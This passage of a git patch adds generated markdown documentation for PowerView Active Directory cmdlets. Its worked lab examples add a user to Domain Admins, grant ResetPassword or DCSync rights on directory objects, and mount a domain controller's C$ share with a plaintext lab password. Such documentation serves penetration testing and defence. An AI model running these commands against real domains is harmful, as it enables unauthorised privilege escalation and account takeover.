From 0aaa23cd8656f0b92f2fac3cd8e6be68eed7d809 Mon Sep 17 00:00:00 2001 From: HarmJ0y Date: Mon, 12 Dec 2016 21:05:08 -0500 Subject: first take at platyPS doc generation --- docs/Recon/Add-DomainGroupMember.md | 142 +++++ docs/Recon/Add-DomainObjectAcl.md | 361 +++++++++++++ docs/Recon/Add-RemoteConnection.md | 114 ++++ docs/Recon/Convert-ADName.md | 184 +++++++ docs/Recon/ConvertFrom-SID.md | 126 +++++ docs/Recon/ConvertFrom-UACValue.md | 127 +++++ docs/Recon/ConvertTo-SID.md | 120 +++++ docs/Recon/Export-PowerViewCSV.md | 117 +++++ docs/Recon/Find-DomainLocalGroupMember.md | 351 +++++++++++++ docs/Recon/Find-DomainObjectPropertyOutlier.md | 261 ++++++++++ docs/Recon/Find-DomainProcess.md | 517 ++++++++++++++++++ docs/Recon/Find-DomainShare.md | 335 ++++++++++++ docs/Recon/Find-DomainUserEvent.md | 451 ++++++++++++++++ docs/Recon/Find-DomainUserLocation.md | 579 +++++++++++++++++++++ docs/Recon/Find-InterestingDomainAcl.md | 239 +++++++++ docs/Recon/Find-InterestingDomainShareFile.md | 463 ++++++++++++++++ docs/Recon/Find-InterestingFile.md | 248 +++++++++ docs/Recon/Find-LocalAdminAccess.md | 337 ++++++++++++ docs/Recon/Get-ComputerDetails.md | 68 +++ docs/Recon/Get-Domain.md | 81 +++ docs/Recon/Get-DomainComputer.md | 426 +++++++++++++++ docs/Recon/Get-DomainController.md | 132 +++++ docs/Recon/Get-DomainDFSShare.md | 202 +++++++ docs/Recon/Get-DomainDNSRecord.md | 181 +++++++ docs/Recon/Get-DomainDNSZone.md | 156 ++++++ docs/Recon/Get-DomainFileServer.md | 200 +++++++ docs/Recon/Get-DomainForeignGroupMember.md | 238 +++++++++ docs/Recon/Get-DomainForeignUser.md | 239 +++++++++ docs/Recon/Get-DomainGPO.md | 354 +++++++++++++ .../Get-DomainGPOComputerLocalGroupMapping.md | 263 ++++++++++ docs/Recon/Get-DomainGPOLocalGroup.md | 259 +++++++++ docs/Recon/Get-DomainGPOUserLocalGroupMapping.md | 258 +++++++++ docs/Recon/Get-DomainGroup.md | 397 ++++++++++++++ docs/Recon/Get-DomainGroupMember.md | 401 ++++++++++++++ docs/Recon/Get-DomainManagedSecurityGroup.md | 177 +++++++ docs/Recon/Get-DomainOU.md | 316 +++++++++++ docs/Recon/Get-DomainObject.md | 318 +++++++++++ docs/Recon/Get-DomainObjectAcl.md | 251 +++++++++ docs/Recon/Get-DomainPolicy.md | 159 ++++++ docs/Recon/Get-DomainSID.md | 102 ++++ docs/Recon/Get-DomainSPNTicket.md | 136 +++++ docs/Recon/Get-DomainSite.md | 309 +++++++++++ docs/Recon/Get-DomainSubnet.md | 309 +++++++++++ docs/Recon/Get-DomainTrust.md | 250 +++++++++ docs/Recon/Get-DomainTrustMapping.md | 220 ++++++++ docs/Recon/Get-DomainUser.md | 426 +++++++++++++++ docs/Recon/Get-DomainUserEvent.md | 144 +++++ docs/Recon/Get-Forest.md | 80 +++ docs/Recon/Get-ForestDomain.md | 82 +++ docs/Recon/Get-ForestGlobalCatalog.md | 78 +++ docs/Recon/Get-ForestTrust.md | 91 ++++ docs/Recon/Get-HttpStatus.md | 106 ++++ docs/Recon/Get-NetComputerSiteName.md | 89 ++++ docs/Recon/Get-NetLocalGroup.md | 132 +++++ docs/Recon/Get-NetLocalGroupMember.md | 212 ++++++++ docs/Recon/Get-NetLoggedon.md | 100 ++++ docs/Recon/Get-NetRDPSession.md | 104 ++++ docs/Recon/Get-NetSession.md | 99 ++++ docs/Recon/Get-NetShare.md | 100 ++++ docs/Recon/Get-PathAcl.md | 94 ++++ docs/Recon/Get-RegLoggedOn.md | 89 ++++ docs/Recon/Get-WMIProcess.md | 80 +++ docs/Recon/Get-WMIRegCachedRDPConnection.md | 99 ++++ docs/Recon/Get-WMIRegLastLoggedOn.md | 98 ++++ docs/Recon/Get-WMIRegMountedDrive.md | 97 ++++ docs/Recon/Get-WMIRegProxy.md | 93 ++++ docs/Recon/Invoke-Kerberoast.md | 233 +++++++++ docs/Recon/Invoke-Portscan.md | 430 +++++++++++++++ docs/Recon/Invoke-ReverseDnsLookup.md | 106 ++++ docs/Recon/Invoke-RevertToSelf.md | 56 ++ docs/Recon/Invoke-UserImpersonation.md | 100 ++++ docs/Recon/New-DomainGroup.md | 150 ++++++ docs/Recon/New-DomainUser.md | 184 +++++++ docs/Recon/Remove-RemoteConnection.md | 84 +++ docs/Recon/Resolve-IPAddress.md | 66 +++ docs/Recon/Set-DomainObject.md | 346 ++++++++++++ docs/Recon/Test-AdminAccess.md | 101 ++++ 77 files changed, 15823 insertions(+) create mode 100755 docs/Recon/Add-DomainGroupMember.md create mode 100755 docs/Recon/Add-DomainObjectAcl.md create mode 100755 docs/Recon/Add-RemoteConnection.md create mode 100755 docs/Recon/Convert-ADName.md create mode 100755 docs/Recon/ConvertFrom-SID.md create mode 100755 docs/Recon/ConvertFrom-UACValue.md create mode 100755 docs/Recon/ConvertTo-SID.md create mode 100755 docs/Recon/Export-PowerViewCSV.md create mode 100755 docs/Recon/Find-DomainLocalGroupMember.md create mode 100755 docs/Recon/Find-DomainObjectPropertyOutlier.md create mode 100755 docs/Recon/Find-DomainProcess.md create mode 100755 docs/Recon/Find-DomainShare.md create mode 100755 docs/Recon/Find-DomainUserEvent.md create mode 100755 docs/Recon/Find-DomainUserLocation.md create mode 100755 docs/Recon/Find-InterestingDomainAcl.md create mode 100755 docs/Recon/Find-InterestingDomainShareFile.md create mode 100755 docs/Recon/Find-InterestingFile.md create mode 100755 docs/Recon/Find-LocalAdminAccess.md create mode 100755 docs/Recon/Get-ComputerDetails.md create mode 100755 docs/Recon/Get-Domain.md create mode 100755 docs/Recon/Get-DomainComputer.md create mode 100755 docs/Recon/Get-DomainController.md create mode 100755 docs/Recon/Get-DomainDFSShare.md create mode 100755 docs/Recon/Get-DomainDNSRecord.md create mode 100755 docs/Recon/Get-DomainDNSZone.md create mode 100755 docs/Recon/Get-DomainFileServer.md create mode 100755 docs/Recon/Get-DomainForeignGroupMember.md create mode 100755 docs/Recon/Get-DomainForeignUser.md create mode 100755 docs/Recon/Get-DomainGPO.md create mode 100755 docs/Recon/Get-DomainGPOComputerLocalGroupMapping.md create mode 100755 docs/Recon/Get-DomainGPOLocalGroup.md create mode 100755 docs/Recon/Get-DomainGPOUserLocalGroupMapping.md create mode 100755 docs/Recon/Get-DomainGroup.md create mode 100755 docs/Recon/Get-DomainGroupMember.md create mode 100755 docs/Recon/Get-DomainManagedSecurityGroup.md create mode 100755 docs/Recon/Get-DomainOU.md create mode 100755 docs/Recon/Get-DomainObject.md create mode 100755 docs/Recon/Get-DomainObjectAcl.md create mode 100755 docs/Recon/Get-DomainPolicy.md create mode 100755 docs/Recon/Get-DomainSID.md create mode 100755 docs/Recon/Get-DomainSPNTicket.md create mode 100755 docs/Recon/Get-DomainSite.md create mode 100755 docs/Recon/Get-DomainSubnet.md create mode 100755 docs/Recon/Get-DomainTrust.md create mode 100755 docs/Recon/Get-DomainTrustMapping.md create mode 100755 docs/Recon/Get-DomainUser.md create mode 100755 docs/Recon/Get-DomainUserEvent.md create mode 100755 docs/Recon/Get-Forest.md create mode 100755 docs/Recon/Get-ForestDomain.md create mode 100755 docs/Recon/Get-ForestGlobalCatalog.md create mode 100755 docs/Recon/Get-ForestTrust.md create mode 100755 docs/Recon/Get-HttpStatus.md create mode 100755 docs/Recon/Get-NetComputerSiteName.md create mode 100755 docs/Recon/Get-NetLocalGroup.md create mode 100755 docs/Recon/Get-NetLocalGroupMember.md create mode 100755 docs/Recon/Get-NetLoggedon.md create mode 100755 docs/Recon/Get-NetRDPSession.md create mode 100755 docs/Recon/Get-NetSession.md create mode 100755 docs/Recon/Get-NetShare.md create mode 100755 docs/Recon/Get-PathAcl.md create mode 100755 docs/Recon/Get-RegLoggedOn.md create mode 100755 docs/Recon/Get-WMIProcess.md create mode 100755 docs/Recon/Get-WMIRegCachedRDPConnection.md create mode 100755 docs/Recon/Get-WMIRegLastLoggedOn.md create mode 100755 docs/Recon/Get-WMIRegMountedDrive.md create mode 100755 docs/Recon/Get-WMIRegProxy.md create mode 100755 docs/Recon/Invoke-Kerberoast.md create mode 100755 docs/Recon/Invoke-Portscan.md create mode 100755 docs/Recon/Invoke-ReverseDnsLookup.md create mode 100755 docs/Recon/Invoke-RevertToSelf.md create mode 100755 docs/Recon/Invoke-UserImpersonation.md create mode 100755 docs/Recon/New-DomainGroup.md create mode 100755 docs/Recon/New-DomainUser.md create mode 100755 docs/Recon/Remove-RemoteConnection.md create mode 100755 docs/Recon/Resolve-IPAddress.md create mode 100755 docs/Recon/Set-DomainObject.md create mode 100755 docs/Recon/Test-AdminAccess.md (limited to 'docs/Recon') diff --git a/docs/Recon/Add-DomainGroupMember.md b/docs/Recon/Add-DomainGroupMember.md new file mode 100755 index 0000000..cc563e9 --- /dev/null +++ b/docs/Recon/Add-DomainGroupMember.md @@ -0,0 +1,142 @@ +# Add-DomainGroupMember + +## SYNOPSIS +Adds a domain user (or group) to an existing domain group, assuming +appropriate permissions to do so. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-PrincipalContext + +## SYNTAX + +``` +Add-DomainGroupMember [-Identity] -Members [-Domain ] [-Credential ] +``` + +## DESCRIPTION +First binds to the specified domain context using Get-PrincipalContext. +The bound domain context is then used to search for the specified -GroupIdentity, +which returns a DirectoryServices.AccountManagement.GroupPrincipal object. +For +each entry in -Members, each member identity is similarly searched for and added +to the group. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y' +``` + +Adds harmj0y to 'Domain Admins' in the current domain. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Add-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y' -Credential $Cred + +Adds harmj0y to 'Domain Admins' in the current domain using the alternate credentials. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +New-DomainUser -SamAccountName andy -AccountPassword $UserPassword -Credential $Cred | Add-DomainGroupMember 'Domain Admins' -Credential $Cred + +Creates the 'andy' user with the specified description and password, using the specified +alternate credentials, and adds the user to 'domain admins' using Add-DomainGroupMember +and the alternate credentials. + +## PARAMETERS + +### -Identity +A group SamAccountName (e.g. +Group1), DistinguishedName (e.g. +CN=group1,CN=Users,DC=testlab,DC=local), +SID (e.g. +S-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g. +4c435dd7-dc58-4b14-9a5e-1fdb0e80d202) +specifying the group to add members to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: GroupName, GroupIdentity + +Required: True +Position: 1 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Members +One or more member identities, i.e. +SamAccountName (e.g. +Group1), DistinguishedName +(e.g. +CN=group1,CN=Users,DC=testlab,DC=local), SID (e.g. +S-1-5-21-890171859-3433809279-3366196753-1114), +or GUID (e.g. +4c435dd7-dc58-4b14-9a5e-1fdb0e80d202). + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: MemberIdentity, Member, DistinguishedName + +Required: True +Position: Named +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use to search for user/group principals, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES + +## RELATED LINKS + +[http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/](http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/) + diff --git a/docs/Recon/Add-DomainObjectAcl.md b/docs/Recon/Add-DomainObjectAcl.md new file mode 100755 index 0000000..c530e81 --- /dev/null +++ b/docs/Recon/Add-DomainObjectAcl.md @@ -0,0 +1,361 @@ +# Add-DomainObjectAcl + +## SYNOPSIS +Adds an ACL for a specific active directory object. + +AdminSDHolder ACL approach from Sean Metcalf (@pyrotek3): https://adsecurity.org/?p=1906 + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainObject + +## SYNTAX + +``` +Add-DomainObjectAcl [[-TargetIdentity] ] [-TargetDomain ] [-TargetLDAPFilter ] + [-TargetSearchBase ] -PrincipalIdentity [-PrincipalDomain ] [-Server ] + [-SearchScope ] [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] + [-Credential ] [-Rights ] [-RightsGUID ] +``` + +## DESCRIPTION +This function modifies the ACL/ACE entries for a given Active Directory +target object specified by -TargetIdentity. +Available -Rights are +'All', 'ResetPassword', 'WriteMembers', 'DCSync', or a manual extended +rights GUID can be set with -RightsGUID. +These rights are granted on the target +object for the specified -PrincipalIdentity. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +$Harmj0ySid = Get-DomainUser harmj0y | Select-Object -ExpandProperty objectsid +``` + +Get-DomainObjectACL dfm.a -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid} + +... + +Add-DomainObjectAcl -TargetIdentity dfm.a -PrincipalIdentity harmj0y -Rights ResetPassword -Verbose +VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(samAccountName=harmj0y))) +VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string:(&(|(samAccountName=dfm.a))) +VERBOSE: \[Add-DomainObjectAcl\] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local 'ResetPassword' on CN=dfm (admin),CN=Users,DC=testlab,DC=local +VERBOSE: \[Add-DomainObjectAcl\] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local rights GUID '00299570-246d-11d0-a768-00aa006e0529' on CN=dfm (admin),CN=Users,DC=testlab,DC=local + +Get-DomainObjectACL dfm.a -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid } + +AceQualifier : AccessAllowed +ObjectDN : CN=dfm (admin),CN=Users,DC=testlab,DC=local +ActiveDirectoryRights : ExtendedRight +ObjectAceType : User-Force-Change-Password +ObjectSID : S-1-5-21-890171859-3433809279-3366196753-1114 +InheritanceFlags : None +BinaryLength : 56 +AceType : AccessAllowedObject +ObjectAceFlags : ObjectAceTypePresent +IsCallback : False +PropagationFlags : None +SecurityIdentifier : S-1-5-21-890171859-3433809279-3366196753-1108 +AccessMask : 256 +AuditFlags : None +IsInherited : False +AceFlags : None +InheritedObjectAceType : All +OpaqueLength : 0 + +### -------------------------- EXAMPLE 2 -------------------------- +``` +$Harmj0ySid = Get-DomainUser harmj0y | Select-Object -ExpandProperty objectsid +``` + +Get-DomainObjectACL testuser -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid} + +\[no results returned\] + +$SecPassword = ConvertTo-SecureString 'Password123!'-AsPlainText -Force +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Add-DomainObjectAcl -TargetIdentity testuser -PrincipalIdentity harmj0y -Rights ResetPassword -Credential $Cred -Verbose +VERBOSE: \[Get-Domain\] Using alternate credentials for Get-Domain +VERBOSE: \[Get-Domain\] Extracted domain 'TESTLAB' from -Credential +VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: \[Get-DomainSearcher\] Using alternate credentials for LDAP connection +VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(|(samAccountName=harmj0y)(name=harmj0y)))) +VERBOSE: \[Get-Domain\] Using alternate credentials for Get-Domain +VERBOSE: \[Get-Domain\] Extracted domain 'TESTLAB' from -Credential +VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: \[Get-DomainSearcher\] Using alternate credentials for LDAP connection +VERBOSE: \[Get-DomainObject\] Get-DomainObject filter string: (&(|(|(samAccountName=testuser)(name=testuser)))) +VERBOSE: \[Add-DomainObjectAcl\] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local 'ResetPassword' on CN=testuser testuser,CN=Users,DC=testlab,DC=local +VERBOSE: \[Add-DomainObjectAcl\] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local rights GUID '00299570-246d-11d0-a768-00aa006e0529' on CN=testuser,CN=Users,DC=testlab,DC=local + +Get-DomainObjectACL testuser -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid } + +AceQualifier : AccessAllowed +ObjectDN : CN=dfm (admin),CN=Users,DC=testlab,DC=local +ActiveDirectoryRights : ExtendedRight +ObjectAceType : User-Force-Change-Password +ObjectSID : S-1-5-21-890171859-3433809279-3366196753-1114 +InheritanceFlags : None +BinaryLength : 56 +AceType : AccessAllowedObject +ObjectAceFlags : ObjectAceTypePresent +IsCallback : False +PropagationFlags : None +SecurityIdentifier : S-1-5-21-890171859-3433809279-3366196753-1108 +AccessMask : 256 +AuditFlags : None +IsInherited : False +AceFlags : None +InheritedObjectAceType : All +OpaqueLength : 0 + +## PARAMETERS + +### -TargetIdentity +A SamAccountName (e.g. +harmj0y), DistinguishedName (e.g. +CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. +S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. +4c435dd7-dc58-4b14-9a5e-1fdb0e80d201) +for the domain object to modify ACLs for. +Required. +Wildcards accepted. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DistinguishedName, SamAccountName, Name + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -TargetDomain +Specifies the domain for the TargetIdentity to use for the modification, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -TargetLDAPFilter +Specifies an LDAP query string that is used to filter Active Directory object targets. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -TargetSearchBase +The LDAP source to search through for targets, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -PrincipalIdentity +A SamAccountName (e.g. +harmj0y), DistinguishedName (e.g. +CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. +S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. +4c435dd7-dc58-4b14-9a5e-1fdb0e80d201) +for the domain principal to add for the ACL. +Required. +Wildcards accepted. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: True +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -PrincipalDomain +Specifies the domain for the TargetIdentity to use for the principal, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Rights +Rights to add for the principal, 'All', 'ResetPassword', 'WriteMembers', 'DCSync'. +Defaults to 'All'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: All +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -RightsGUID +Manual GUID representing the right to add to the target. + +```yaml +Type: Guid +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES + +## RELATED LINKS + +[https://adsecurity.org/?p=1906 +https://social.technet.microsoft.com/Forums/windowsserver/en-US/df3bfd33-c070-4a9c-be98-c4da6e591a0a/forum-faq-using-powershell-to-assign-permissions-on-active-directory-objects?forum=winserverpowershell](https://adsecurity.org/?p=1906 +https://social.technet.microsoft.com/Forums/windowsserver/en-US/df3bfd33-c070-4a9c-be98-c4da6e591a0a/forum-faq-using-powershell-to-assign-permissions-on-active-directory-objects?forum=winserverpowershell) + diff --git a/docs/Recon/Add-RemoteConnection.md b/docs/Recon/Add-RemoteConnection.md new file mode 100755 index 0000000..86112e2 --- /dev/null +++ b/docs/Recon/Add-RemoteConnection.md @@ -0,0 +1,114 @@ +# Add-RemoteConnection + +## SYNOPSIS +Pseudo "mounts" a connection to a remote path using the specified +credential object, allowing for access of remote resources. +If a -Path isn't +specified, a -ComputerName is required to pseudo-mount IPC$. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect + +## SYNTAX + +### ComputerName (Default) +``` +Add-RemoteConnection [-ComputerName] -Credential +``` + +### Path +``` +Add-RemoteConnection [-Path] -Credential +``` + +## DESCRIPTION +This function uses WNetAddConnection2W to make a 'temporary' (i.e. +not saved) connection +to the specified remote -Path (\\\\UNC\share) with the alternate credentials specified in the +-Credential object. +If a -Path isn't specified, a -ComputerName is required to pseudo-mount IPC$. + +To destroy the connection, use Remove-RemoteConnection with the same specified \\\\UNC\share path +or -ComputerName. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +$Cred = Get-Credential +``` + +Add-RemoteConnection -ComputerName 'PRIMARY.testlab.local' -Credential $Cred + +### -------------------------- EXAMPLE 2 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Add-RemoteConnection -Path '\\\\PRIMARY.testlab.local\C$\' -Credential $Cred + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$Cred = Get-Credential +``` + +@('PRIMARY.testlab.local','SECONDARY.testlab.local') | Add-RemoteConnection -Credential $Cred + +## PARAMETERS + +### -ComputerName +Specifies the system to add a \\\\ComputerName\IPC$ connection for. + +```yaml +Type: String[] +Parameter Sets: ComputerName +Aliases: HostName, dnshostname, name + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Path +Specifies the remote \\\\UNC\path to add the connection for. + +```yaml +Type: String[] +Parameter Sets: Path +Aliases: + +Required: True +Position: 1 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the remote system. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: True +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Convert-ADName.md b/docs/Recon/Convert-ADName.md new file mode 100755 index 0000000..7f9f42b --- /dev/null +++ b/docs/Recon/Convert-ADName.md @@ -0,0 +1,184 @@ +# Convert-ADName + +## SYNOPSIS +Converts Active Directory object names between a variety of formats. + +Author: Bill Stewart, Pasquale Lantella +Modifications: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Convert-ADName [-Identity] [[-OutputType] ] [[-Domain] ] [[-Server] ] + [[-Credential] ] +``` + +## DESCRIPTION +This function is heavily based on Bill Stewart's code and Pasquale Lantella's code (in LINK) +and translates Active Directory names between various formats using the NameTranslate COM object. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Convert-ADName -Identity "TESTLAB\harmj0y" +``` + +harmj0y@testlab.local + +### -------------------------- EXAMPLE 2 -------------------------- +``` +"TESTLAB\krbtgt", "CN=Administrator,CN=Users,DC=testlab,DC=local" | Convert-ADName -OutputType Canonical +``` + +testlab.local/Users/krbtgt +testlab.local/Users/Administrator + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Convert-ADName -OutputType dn -Identity 'TESTLAB\harmj0y' -Server PRIMARY.testlab.local +``` + +CN=harmj0y,CN=Users,DC=testlab,DC=local + +### -------------------------- EXAMPLE 4 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm', $SecPassword) +'S-1-5-21-890171859-3433809279-3366196753-1108' | Convert-ADNAme -Credential $Cred + +TESTLAB\harmj0y + +## PARAMETERS + +### -Identity +Specifies the Active Directory object name to translate, of the following form: + + DN short for 'distinguished name'; e.g., 'CN=Phineas Flynn,OU=Engineers,DC=fabrikam,DC=com' + Canonical canonical name; e.g., 'fabrikam.com/Engineers/Phineas Flynn' + NT4 domain\username; e.g., 'fabrikam\pflynn' + Display display name, e.g. +'pflynn' + DomainSimple simple domain name format, e.g. +'pflynn@fabrikam.com' + EnterpriseSimple simple enterprise name format, e.g. +'pflynn@fabrikam.com' + GUID GUID; e.g., '{95ee9fff-3436-11d1-b2b0-d15ae3ac8436}' + UPN user principal name; e.g., 'pflynn@fabrikam.com' + CanonicalEx extended canonical name format + SPN service principal name format; e.g. +'HTTP/kairomac.contoso.com' + SID Security Identifier; e.g., 'S-1-5-21-12986231-600641547-709122288-57999' + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: Name, ObjectName + +Required: True +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -OutputType +Specifies the output name type you want to convert to, which must be one of the following: + + DN short for 'distinguished name'; e.g., 'CN=Phineas Flynn,OU=Engineers,DC=fabrikam,DC=com' + Canonical canonical name; e.g., 'fabrikam.com/Engineers/Phineas Flynn' + NT4 domain\username; e.g., 'fabrikam\pflynn' + Display display name, e.g. +'pflynn' + DomainSimple simple domain name format, e.g. +'pflynn@fabrikam.com' + EnterpriseSimple simple enterprise name format, e.g. +'pflynn@fabrikam.com' + GUID GUID; e.g., '{95ee9fff-3436-11d1-b2b0-d15ae3ac8436}' + UPN user principal name; e.g., 'pflynn@fabrikam.com' + CanonicalEx extended canonical name format, e.g. +'fabrikam.com/Users/Phineas Flynn' + SPN service principal name format; e.g. +'HTTP/kairomac.contoso.com' + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 2 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the translation, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 3 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to for the translation. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: 4 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +Specifies an alternate credential to use for the translation. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: 5 +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +### String + +Accepts one or more objects name strings on the pipeline. + +## OUTPUTS + +### String + +Outputs a string representing the converted name. + +## NOTES + +## RELATED LINKS + +[http://windowsitpro.com/active-directory/translating-active-directory-object-names-between-formats +https://gallery.technet.microsoft.com/scriptcenter/Translating-Active-5c80dd67](http://windowsitpro.com/active-directory/translating-active-directory-object-names-between-formats +https://gallery.technet.microsoft.com/scriptcenter/Translating-Active-5c80dd67) + diff --git a/docs/Recon/ConvertFrom-SID.md 